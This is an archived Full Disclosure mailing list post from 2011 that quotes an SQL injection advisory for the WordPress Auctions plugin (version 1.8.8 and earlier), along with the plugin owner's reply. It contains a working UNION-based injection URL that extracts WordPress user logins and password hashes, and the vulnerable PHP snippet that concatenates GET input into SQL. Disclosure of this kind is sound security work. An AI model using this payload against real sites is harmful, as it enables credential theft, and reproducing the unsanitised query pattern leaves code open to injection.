|
Full Disclosure
mailing list archives
Re: WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability
From: Henri Salo <henri () nerv fi>
Date: Thu, 15 Sep 2011 16:44:47 +0300
On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote:
# Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
Vulnerability
# Date: 2011-09-09
# Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org>
@AlligatorTeam
# Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
# Version: 1.8.8 (tested)
---------------
PoC
---------------
URL:
http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
---------------
Vulnerable code
---------------
...
elseif($_GET["wpa_action"] == "edit"):
$strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
...
elseif($_GET["wpa_action"] == "relist"):
$strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
...
$resultList = $wpdb->get_row($strSQL);
...
Module owner replied:
"Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we
will address immediately). It's work pointing out though, that this is an administration module (protected by
WordPress's user permissions); rather than one that can be access anonymously."
Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622
Best regards,
Henri Salo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
|
